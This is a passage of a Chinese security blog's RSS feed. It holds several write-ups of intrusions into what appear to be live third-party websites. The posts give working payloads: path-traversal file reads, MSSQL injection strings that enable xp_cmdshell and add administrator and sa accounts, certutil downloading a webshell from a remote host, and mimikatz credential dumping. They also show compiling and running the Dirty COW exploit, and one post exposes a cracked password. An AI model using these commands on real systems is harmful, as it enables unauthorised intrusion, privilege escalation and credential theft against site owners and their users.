<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1ed03353413046836516-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1ed03353413046836516-1" class="crayon-line"><span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-c">//www.xxx.com/download.php?dnfile=1.php&amp;file=/usr/local/apache/conf/httpd.conf</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87bc74dca1b.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87bc74dca1b.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>惊了！html可以被当作php文件！</p>
<p>于是我去编辑器中尝试上传这几种文件，仍以失败告终。</p>
<p>但是附件的我们还没试！</p>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87bd536fb44.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87bd536fb44.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>抓包改后缀，返回文章查看路径</p>
<div class="highlight">
<div class="chroma ">
<div id="crayon-5d1ed03353415250991749" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1ed03353415250991749-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1ed03353415250991749-1" class="crayon-line"><span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-c">//www.xxx.com/download.php?dnfile=php.jpg.html&amp;file=/home/xxx/webapp/../public_html/upload_dir/board/13303476456487546a3cd.html</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<p>拼接</p>
<div class="highlight">
<div class="chroma ">
<div id="crayon-5d1ed03353417950859730" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main">
<table class="crayon-table">
<tbody>
<tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content">
<div class="crayon-num" data-line="crayon-5d1ed03353417950859730-1">1</div>
</div>
</td>
<td class="crayon-code">
<div class="crayon-pre">
<div id="crayon-5d1ed03353417950859730-1" class="crayon-line"><span class="crayon-v">http</span><span class="crayon-o">:</span><span class="crayon-c">//www.xxx.com/upload_dir/board/13303476456487546a3cd.html</span></div>
</div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87bdf9285ac.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87bdf9285ac.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>getshell!</p>
<p>后面的就不说了，提权就是<a class="tag_link" title="浏览关于“脏牛”的文章" href="/tags/%e8%84%8f%e7%89%9b" target="_blank" rel="noopener noreferrer">脏牛</a>+<a href="https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD" target="_blank" rel="nofollow noopener noreferrer">bypass disablefunc</a>一条龙，没啥亮点。</p>
<div class="post-image"><a class="fancybox" title="记一次渗透之从后台到提权" href="https://i.loli.net/2019/03/12/5c87bf81230af.png" target="_blank" rel="box noopener noreferrer" data-fancybox="gallery" data-caption=""><img src="https://i.loli.net/2019/03/12/5c87bf81230af.png" alt="记一次渗透之从后台到提权-ChaBug安全" /></a></div>
<p>本章结束，寡人欲休。</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>【Hello_C】一次费劲的注入到提权</title>
		<link>/web/592.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sun, 21 Oct 2018 11:55:14 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[实战]]></category>
		<category><![CDATA[注入]]></category>
		<category><![CDATA[渗透]]></category>
		<guid isPermaLink="false">/?p=592</guid>

					<description><![CDATA[一次偶然发现了一处注入，apsx注入，之前练得少，决定试一试看看，先sqlmap跑一波 500报错，可能跑不出来，于是试试手工，sqlmap被拦了，但是手工很顺利，可能是加了sql...]]></description>
										<content:encoded><![CDATA[<p>一次偶然发现了一处<span class="wpcom_tag_link"><a href="/tags/%e6%b3%a8%e5%85%a5" title="注入" target="_blank">注入</a></span>，apsx注入，之前练得少，决定试一试看看，先sqlmap跑一波</p>
<p><a href="https://img.chabug.org/img/20181021194327.png"><img loading="lazy" class="aligncenter size-medium" src="https://img.chabug.org/img/20181021194327.png" width="435" height="276" /></a><a href="https://img.chabug.org/img/20181021194419.png"><img loading="lazy" class="aligncenter size-medium" src="https://img.chabug.org/img/20181021194419.png" width="554" height="134" /></a></p>
<p>500报错，可能跑不出来，于是试试手工，sqlmap被拦了，但是手工很顺利，可能是加了sqlmap的指纹了吧；</p>
<p><a href="https://img.chabug.org/img/20181021194543.png"><img loading="lazy" class="aligncenter size-medium" src="https://img.chabug.org/img/20181021194543.png" width="554" height="120" /></a><a href="https://img.chabug.org/img/20181021194543.png">https://img.chabug.org/img/20181021194543.png</a></p>
<p>判断版本&#8217; or @@version&gt;0 &#8212;</p>
<p><a href="https://img.chabug.org/img/20181021194626.png"><img loading="lazy" class="aligncenter size-medium" src="https://img.chabug.org/img/20181021194626.png" width="554" height="139" /></a></p>
<p>计算机名 &#8216; or @@SERVERNAME&gt;0 &#8212;</p>
<p>爆当前数据库名 &#8216; or db_name()&gt;0 &#8212;</p>
<p>&nbsp;</p>
<p>网站没有找见后台，想着跑出来密码也没有登录地方，于是那些查找数据库、表名、字段名就直接略过，跑出来也登不进去。</p>
<p>先看看其他网站，于是先跑一下二级域名以及旁站，bing查询确实很棒，可以查出好多旁站，极力推荐；</p>
<p>发现三处旁站，一个php的、一个oa还有一个致远协同，没有可以利用的地方，还是先看看注入吧；</p>
<p>先看注入, 当前用户  &#8216; or user_name()&gt;0 &#8212;</p>
<p><a href="https://img.chabug.org/img/20181021194846.png"><img loading="lazy" class="aligncenter size-medium" src="https://img.chabug.org/img/20181021194846.png" width="508" height="121" /></a></p>
<p>判断是否支持多句查询</p>
<pre class="lang:default decode:true ">’;declare @s int;--</pre>
<p>&nbsp;</p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg36kpugwj30cp03vaa4.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg36kpugwj30cp03vaa4.jpg" width="457" height="139" /></a></p>
<p>查看一下xp_cmdshell是否开启</p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg36v5hssj30ez02ot9j.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg36v5hssj30ez02ot9j.jpg" width="539" height="96" /></a></p>
<p>首先开启一下xp_cmdshell</p>
<pre class="lang:default decode:true ">';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--</pre>
<p>&nbsp;</p>
<p>显示登录成功，则是命令执行成功，成功开启xp_cmdshell，然后可以执行命令了，但是执行命令没有回显，正常现象；</p>
<p>直接添加用户，显示执行成功，但是没有用户添加上，郁闷，之后才发现是火绒的问题。</p>
<pre class="lang:default decode:true ">';exec master..xp_cmdshell 'net user web$ Web123!@# /add';--

';exec master..xp_cmdshell 'net localgroup administrators web$ /add';--

执行cmd回显：

';create table temp(id int identity(1,1),a varchar(8000));--   创建一个表

';insert into temp exec master.dbo.xp_cmdshell 'whoami'; --   执行cmd指令并且插入到表中

' and (select substring((select a from temp for xml auto),1,8000))&gt;0;-- 可以一次得到所有的结果

';drop table temp;--  删除表</pre>
<p>&nbsp;</p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg37e019zj30dl065jud.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg37e019zj30dl065jud.jpg" width="489" height="221" /></a><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg37li1fij30fe071jv1.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg37li1fij30fe071jv1.jpg" width="554" height="253" /></a></p>
<p>目标显示开启了1433,3389,3306端口，于是可以添加sa用户然后远程连接，增加sa用户：</p>
<pre class="lang:default decode:true ">';exec master.dbo.sp_addlogin test,password;--

';exec master.dbo.sp_addsrvrolemember test,sysadmin;--</pre>
<p>&nbsp;</p>
<p>可以直接连接，方便好多，比刚才执行命令舒服了好多；</p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg37vhym9j30c007uabs.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg37vhym9j30c007uabs.jpg" width="432" height="282" /></a></p>
<p>完美，可以直接执行命令，美滋滋。CS或者Msf直接撸之，但是没有vps就很心疼啊，只能找个shell远程下载了。</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>发现旁站php的配置文件，然后还有phpmyadmin，这里有几个思路拿shell:</p>
<ul>
<li>直接远程下载到web路径；</li>
<li>旁站phpmyadmin后台拿shell;</li>
<li>旁站登录后台拿shell;</li>
</ul>
<p>&nbsp;</p>
<p>第一个：</p>
<p>直接下载，然后，或者直接下载wce或者procdump.exe直接读取管理员密码然后登录，美滋滋。</p>
<pre class="lang:default decode:true ">certutil.exe -urlcache -split -f http://xxx/uploads/conf1g.txt conf1g.php

move conf1g.php  E:\xxxxx\   失败</pre>
<p>&nbsp;</p>
<p>直接500报错，看来是有waf，难怪slamp一直跑不出来，直接换个过狗的吧</p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg3852a4sj30fe04r0t4.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg3852a4sj30fe04r0t4.jpg" width="554" height="171" /></a></p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg38h3ebyj30fe03nt9u.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg38h3ebyj30fe03nt9u.jpg" width="554" height="131" /></a></p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg38r20ysj30fe04r0ti.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg38r20ysj30fe04r0ti.jpg" width="554" height="171" /></a></p>
<p>&nbsp;</p>
<p>第二个:</p>
<p>phpmyadmin后台登录几种建表方式没有成功，然后日志写shell也没有成功</p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg390iqznj30fe05vjs8.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg390iqznj30fe05vjs8.jpg" width="554" height="211" /></a></p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg3980ffnj30dt02zjs0.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg3980ffnj30dt02zjs0.jpg" width="497" height="107" /></a></p>
<p>第三种</p>
<p>php站进入后台拿shell，密码还没有解开，暂时无法登录拿shell</p>
<p>&nbsp;</p>
<p>最近发布的冰蝎管理shell，免杀还是不错的，大马带小马，可以简单操作了</p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg39granlj30ed03egm8.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg39granlj30ed03egm8.jpg" width="517" height="122" /></a></p>
<p>抓hash</p>
<p>wce  失败</p>
<p>Procdump导出，使用mimikatz</p>
<pre class="lang:default decode:true ">mimikatz# sekurlsa::minidump lsass.dmp

mimikatz# sekurlsa::logonPasswords full</pre>
<p>&nbsp;</p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg39pnfgoj309s066gmg.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg39pnfgoj309s066gmg.jpg" width="352" height="222" /></a></p>
<p>成功拿到密码登录</p>
<p><a href="https://ws1.sinaimg.cn/large/006xriynly1fwg39z8bokj30fe07fmz5.jpg"><img loading="lazy" class="aligncenter size-medium" src="https://ws1.sinaimg.cn/large/006xriynly1fwg39z8bokj30fe07fmz5.jpg" width="554" height="267" /></a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>渗透某智能交易网</title>
		<link>/web/360.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Fri, 23 Feb 2018 12:27:23 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[实战]]></category>
		<category><![CDATA[注入]]></category>
		<category><![CDATA[渗透]]></category>
		<category><![CDATA[解析漏洞]]></category>
		<guid isPermaLink="false">/?p=249</guid>

					<description><![CDATA[原文xz：https://exp10it.cn/index.php/archives/948/ 有删减 下午看见 chabug 群里直播日站 这个站点好像一直没搞下想着主站应该什么...]]></description>
										<content:encoded><![CDATA[<blockquote><p>原文xz：<a href="https://exp10it.cn/index.php/archives/948/">https://exp10it.cn/index.php/archives/948/</a>  有删减</p></blockquote>
<p>下午看见 chabug 群里直播日站 这个站点好像一直没搞下<br />想着主站应该什么思路都试过了，那我们就看看旁站<br /><img src="/wp-content/uploads/2018/02/4013565014.jpg" alt="1519211706.jpg" title="1519211706.jpg"></p>
<p>搞下后发现并不能跨目录</p>
<p>回到主站</p>
<p>后台<br /><img src="/wp-content/uploads/2018/02/870924896.jpg" alt="1519211774.jpg" title="1519211774.jpg"><br />主站<span class="wpcom_tag_link"><a href="/tags/%e6%b3%a8%e5%85%a5" title="注入" target="_blank">注入</a></span><br /><img src="/wp-content/uploads/2018/02/3464910292.jpg" alt="1519211913.jpg" title="1519211913.jpg"><br />有过滤<br /><img src="/wp-content/uploads/2018/02/292031456.jpg" alt="1519211923.jpg" title="1519211923.jpg"><br />大小写绕过<br /><img src="/wp-content/uploads/2018/02/2077749061.jpg" alt="1519211931.jpg" title="1519211931.jpg"><br />sqlmap没 dump 出来</p>
<p>估计很多人到这里就放弃了&#8230;</p>
<p>自己写个小脚本跑内容</p>
<p>原理就是手工注入<br /><img src="/wp-content/uploads/2018/02/643884795.jpg" alt="1519211988.jpg" title="1519211988.jpg"><br /><img src="/wp-content/uploads/2018/02/4112437221.jpg" alt="1519212013.jpg" title="1519212013.jpg"><br />后台只有 fckeditor 还是 1.0 的 果断放弃</p>
<p>于是扫目录<br /><img src="/wp-content/uploads/2018/02/4073097413.jpg" alt="1519212185.jpg" title="1519212185.jpg"><br />filepath 截断<br /><img src="/wp-content/uploads/2018/02/186080850.jpg" alt="1519212229.jpg" title="1519212229.jpg"><br />访问 404</p>
<p>a.asp; 这样也不行 服务器是 iis7 的</p>
<p>想到旁站里有 php 的站点 试试<span class="wpcom_tag_link"><a href="/tags/%e8%a7%a3%e6%9e%90%e6%bc%8f%e6%b4%9e" title="解析漏洞" target="_blank">解析漏洞</a></span><br /><img src="/wp-content/uploads/2018/02/2721861022.jpg" alt="1519212280.jpg" title="1519212280.jpg"><br /><img src="/wp-content/uploads/2018/02/3427780922.jpg" alt="1519212287.jpg" title="1519212287.jpg"></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>莫名其妙的后台拿shell加上Linux提权</title>
		<link>/web/352.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sun, 11 Feb 2018 06:50:00 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[getshell]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[实战]]></category>
		<category><![CDATA[提权]]></category>
		<category><![CDATA[渗透]]></category>
		<category><![CDATA[脏牛]]></category>
		<guid isPermaLink="false">/?p=189</guid>

					<description><![CDATA[当我还在被窝的时候，我们的@X1r0z大佬就已经在日站了。。 或许这就是大佬吧。 大佬召唤，我不得不起床。进入后台，寻找上传点，卧槽，发现FCK编辑器哎我们的XZ大佬现在连FCK编...]]></description>
										<content:encoded><![CDATA[<p>当我还在被窝的时候，我们的<a href="https://exp10it.cn/">@X1r0z大佬</a>就已经在日站了。。</p>
<p><img src="/wp-content/uploads/2018/02/433466645.png" alt="1.png" title="1.png"><br />或许这就是大佬吧。</p>
<p>大佬召唤，我不得不起床。<br />进入后台，寻找上传点，卧槽，发现FCK编辑器哎<br /><img src="/wp-content/uploads/2018/02/2345141013.png" alt="2.png" title="2.png"><br />我们的XZ大佬现在连FCK编辑器都拿不下来了吗？那就到我装逼的时候了！<br />然后GG，点击上传图片竟然。。<br /><img src="/wp-content/uploads/2018/02/2718947025.png" alt="5.png" title="5.png"></p>
<p>怪不得，大佬可是给我扔了个黑锅啊。不过还好，旁边还有一个<code>小文件上传</code>，是个上传点。<br /><img src="/wp-content/uploads/2018/02/2580867573.png" alt="3.png" title="3.png"><br />可是看到这个布局我突然有一种不详的预感。管他呢，burp一顿怼之后，草草放弃了。<br />因为不管怎么改文件名怎么截断都不解析啊。算了，再翻翻其他的。<br /><img src="/wp-content/uploads/2018/02/2360087802.png" alt="4.png" title="4.png"><br />这个语言包管理直觉是能够利用，不过可能还要百度源代码审计，想想放弃了，毕竟人家还是小白呢。</p>
<p>继续翻，我就不信了，发现又一个上传点！<br /><img src="/wp-content/uploads/2018/02/2933152389.png" alt="6.png" title="6.png"><br />好熟悉啊，和刚才发布文章的页面一毛一样！竟然在这有上传点。</p>
<p>那就开怼把！点击<code>插入图片</code>之后是这个样子<br /><img src="/wp-content/uploads/2018/02/270342418.png" alt="7.png" title="7.png"><br />很草率啊，不知道能不能上传。先上传一张正常的试试<br /><img src="/wp-content/uploads/2018/02/4069183061.png" alt="8.png" title="8.png"><br />竟然ok？！那就再试试直接传php后缀的<br /><img src="/wp-content/uploads/2018/02/3078760086.png" alt="9.png" title="9.png"><br />也上传成功了，但是没有返回路径？？？不急，我记得有一个文件管理。<br /><img src="/wp-content/uploads/2018/02/3185685965.png" alt="10.png" title="10.png"><br />果然ojbk了。<br /><img src="/wp-content/uploads/2018/02/1388588561.png" alt="11.png" title="11.png"><br />有没有很佩服我优秀的打码呢？<br />虚拟终端</p>
<pre><code>[*] 基本信息 [     Linux xxx 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64(xxx) ]
[/wwwroot/upfiles/201802/11/]$ whoami
damachuli
[/wwwroot/upfiles/201802/11/]$ uname -a
Linux xxx 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
</code></pre>
<p>竟然是<span class="wpcom_tag_link"><a href="/tags/linux" title="Linux" target="_blank">Linux</a></span>机器，2012年的，我们可以试试<span class="wpcom_tag_link"><a href="/tags/%e8%84%8f%e7%89%9b" title="脏牛" target="_blank">脏牛</a></span><a href="/archives/48.html">详情看这里</a></p>
<pre><code>下载
wget https://raw.githubusercontent.com/FireFart/dirtycow/master/dirty.c
编译
gcc -pthread dirty.c -o dirty -lcrypt
运行
./dirty 123456</code></pre>
<p>然后尝试链接提示</p>
<pre><code>fuzz@DESKTOP-JJAMRAA:~$ ssh root@114.80.xxx.xxx
ssh: connect to host 114.80.xxx.xxx port 22: Connection refused</code></pre>
<p><code>netstat -ntpl</code>查看端口<br /><img src="/wp-content/uploads/2018/02/535194959.png" alt="13.png" title="13.png"><br />尝试后发现是55022<br />链接<br /><img src="/wp-content/uploads/2018/02/3956331579.png" alt="13.png" title="13.png"></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>记一次毫无亮点的私服服务器渗透+提权</title>
		<link>/web/346.html</link>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Wed, 31 Jan 2018 19:44:00 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[shell]]></category>
		<category><![CDATA[实战]]></category>
		<category><![CDATA[渗透]]></category>
		<category><![CDATA[解析]]></category>
		<guid isPermaLink="false">/?p=127</guid>

					<description><![CDATA[毫无亮点的一次渗透经历这吊毛，什么几把站点都往我这仍！哇！看到这个我就想起了：“大家好，我系渣渣辉。”御剑扫一波,发现上传点。习惯性burp抓包思密达先go一下发现正常上传。标重点...]]></description>
										<content:encoded><![CDATA[<p>毫无亮点的一次<span class="wpcom_tag_link"><a href="/tags/%e6%b8%97%e9%80%8f" title="渗透" target="_blank">渗透</a></span>经历<br /><img src="/wp-content/uploads/2018/01/1054833045.png" alt="1.png" title="1.png"><br />这吊毛，什么几把站点都往我这仍！<br /><img src="/wp-content/uploads/2018/01/572101772.png" alt="2.png" title="2.png"><br />哇！看到这个我就想起了：“大家好，我系渣渣辉。”<br />御剑扫一波,发现上传点。<br /><img src="/wp-content/uploads/2018/01/2578795906.png" alt="3.png" title="3.png"><br />习惯性burp抓包思密达<br /><img src="/wp-content/uploads/2018/01/3590825814.png" alt="4.png" title="4.png"><br />先go一下发现正常上传。标重点，apache2.4的web容器，直接<span class="wpcom_tag_link"><a href="/tags/%e8%a7%a3%e6%9e%90" title="解析" target="_blank">解析</a></span>漏洞改后缀为<code>.PHP</code>上传即可<br /><img src="/wp-content/uploads/2018/01/29498286.png" alt="5.png" title="5.png"><br />完全哦你妈的蛇皮棒棒K<br /><img src="/wp-content/uploads/2018/01/4021494741.png" alt="6.png" title="6.png"><br />菜刀链接<br /><img src="/wp-content/uploads/2018/01/1493658059.png" alt="7.png" title="7.png"><br /><img src="/wp-content/uploads/2018/01/1156966701.png" alt="8.png" title="8.png"><br />wamp搭建的，权限很大。直接<code>net user</code>就行了<br />附张合照<br /><img src="/wp-content/uploads/2018/01/3245780212.png" alt="9.png" title="9.png"></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>淫荡思路拿下某房产网</title>
		<link>/web/343.html</link>
					<comments>/web/343.html#comments</comments>
		
		<dc:creator><![CDATA[Y4er]]></dc:creator>
		<pubDate>Sun, 28 Jan 2018 14:15:00 +0000</pubDate>
				<category><![CDATA[渗透测试]]></category>
		<category><![CDATA[实战]]></category>
		<category><![CDATA[思路]]></category>
		<category><![CDATA[渗透]]></category>
		<guid isPermaLink="false">/?p=84</guid>

					<description><![CDATA[目标网站win2003 + iis6 + access + asp 首先扫目录有上传页面 白名单 上传失败 wvs 检测到注入点表没跑出来首页有 用户注册个人中心发布信息 那里上传...]]></description>
										<content:encoded><![CDATA[<p>目标网站<br /><img src="/wp-content/uploads/2018/01/1613194789.jpg" alt="1.jpg" title="1.jpg"><br />win2003 + iis6 + access + asp</p>
<p>首先扫目录<br /><img src="/wp-content/uploads/2018/01/2566360162.jpg" alt="2.jpg" title="2.jpg"><br />有上传页面 白名单 上传失败</p>
<p>wvs 检测到注入点<br /><img src="/wp-content/uploads/2018/01/2931145600.jpg" alt="3.jpg" title="3.jpg"><br />表没跑出来<br /><img src="/wp-content/uploads/2018/01/2241425302.jpg" alt="4.jpg" title="4.jpg"><br />首页有 用户注册<br /><img src="/wp-content/uploads/2018/01/1969680409.jpg" alt="5.jpg" title="5.jpg"><br />个人中心<br /><img src="/wp-content/uploads/2018/01/3688801265.jpg" alt="6.jpg" title="6.jpg"><br />发布信息 那里上传调用的也是 /inc/upload.asp</p>
<p>没啥<span class="wpcom_tag_link"><a href="/tags/%e6%80%9d%e8%b7%af" title="思路" target="_blank">思路</a></span> 于是就检测旁站 扫到 shell<br /><img src="/wp-content/uploads/2018/01/916705836.jpg" alt="7.jpg" title="7.jpg"><br />不灭之魂 右键源代码 font 后面就是密码</p>
<p><img src="/wp-content/uploads/2018/01/3942681093.jpg" alt="8.jpg" title="8.jpg"></p>
<p>?profile=a 爆密码<br /><img src="/wp-content/uploads/2018/01/2184906419.jpg" alt="9.jpg" title="9.jpg"><br />freehost 星外虚拟主机</p>
<p><img src="/wp-content/uploads/2018/01/1828283220.jpg" alt="10.jpg" title="10.jpg"></p>
<p>提权渣&#8230;</p>
<p>Media Index 目录可以执行文件<br /><img src="/wp-content/uploads/2018/01/3307604897.jpg" alt="11.jpg" title="11.jpg"><br />上传 cmd.exe</p>
<p>不过1秒后就被杀软干掉了</p>
<p>因为是星外的主机 支持 php 尝试写一个死循环不断写入二进制文件</p>
<p>文件生成成功 但拒绝访问<br /><img src="/wp-content/uploads/2018/01/1628105615.jpg" alt="12.jpg" title="12.jpg"><br />百度发现星外主机还有一个跨目录漏洞</p>
<p><a href="/archives/113.html">星外虚拟主机跨目录技巧</a><br /><img src="/wp-content/uploads/2018/01/1199028655.jpg" alt="13.jpg" title="13.jpg"><br />目标站是 q 开头的 找到这些可疑路径<br /><img src="/wp-content/uploads/2018/01/1086339470.jpg" alt="14.jpg" title="14.jpg"><br />打包源码 下载 查看数据库</p>
<p><img src="/wp-content/uploads/2018/01/4273026843.jpg" alt="15.jpg" title="15.jpg"></p>
<p>md5 无法解密</p>
<p>仔细看 xinyu 用户</p>
<p>旁站找到一个网站</p>
<p><img src="/wp-content/uploads/2018/01/2730933926.jpg" alt="16.jpg" title="16.jpg"></p>
<p>建站公司 竟然改成房产了&#8230;</p>
<p>想了想 可能是后门账户</p>
<p>于是下载它的源码</p>
<p><img src="/wp-content/uploads/2018/01/2791474558.jpg" alt="17.jpg" title="17.jpg"></p>
<p>翻了一会 发现网站配置文件</p>
<p>邮件服务器的账号密码</p>
<p>目标站</p>
<p><img src="/wp-content/uploads/2018/01/4052985042.jpg" alt="18.jpg" title="18.jpg"></p>
<p>建站公司<br /><img src="/wp-content/uploads/2018/01/76253023.jpg" alt="19.jpg" title="19.jpg"><br /><code>JJJdhy217315</code></p>
<p>somd5<br /><img src="/wp-content/uploads/2018/01/1772607700.jpg" alt="20.jpg" title="20.jpg"><br />和之前解不出来的 md5 一样</p>
<p>直接拿密码登录后台<br /><img src="/wp-content/uploads/2018/01/1425038825.jpg" alt="21.jpg" title="21.jpg"><br />有数据库备份<br /><img src="/wp-content/uploads/2018/01/1206462285.jpg" alt="22.jpg" title="22.jpg"><br />尼玛没权限<br /><img src="/wp-content/uploads/2018/01/491777432.jpg" alt="23.jpg" title="23.jpg"><br />本地继续翻源码 看看有没有其他上传点</p>
<p>翻到 house 目录 发现 dhb1.asp<br /><img src="/wp-content/uploads/2018/01/1271669833.jpg" alt="24.jpg" title="24.jpg"><br />dhb 电话簿</p>
<p>后台<img src="/wp-content/uploads/2018/01/2338526558.jpg" alt="25.jpg" title="25.jpg"></p>
<p>和源码里的一样</p>
<p>插入一句话<br /><img src="/wp-content/uploads/2018/01/3188908232.jpg" alt="26.jpg" title="26.jpg"><br />保存成功</p>
<p>连接<br /><img src="/wp-content/uploads/2018/01/2556453786.jpg" alt="27.jpg" title="27.jpg"></p>
]]></content:encoded>
					
					<wfw:commentRss>/web/343.html/feed</wfw:commentRss>
			<slash:comments>1</slash:comments>
		
		
			</item>
	</channel>
</rss>
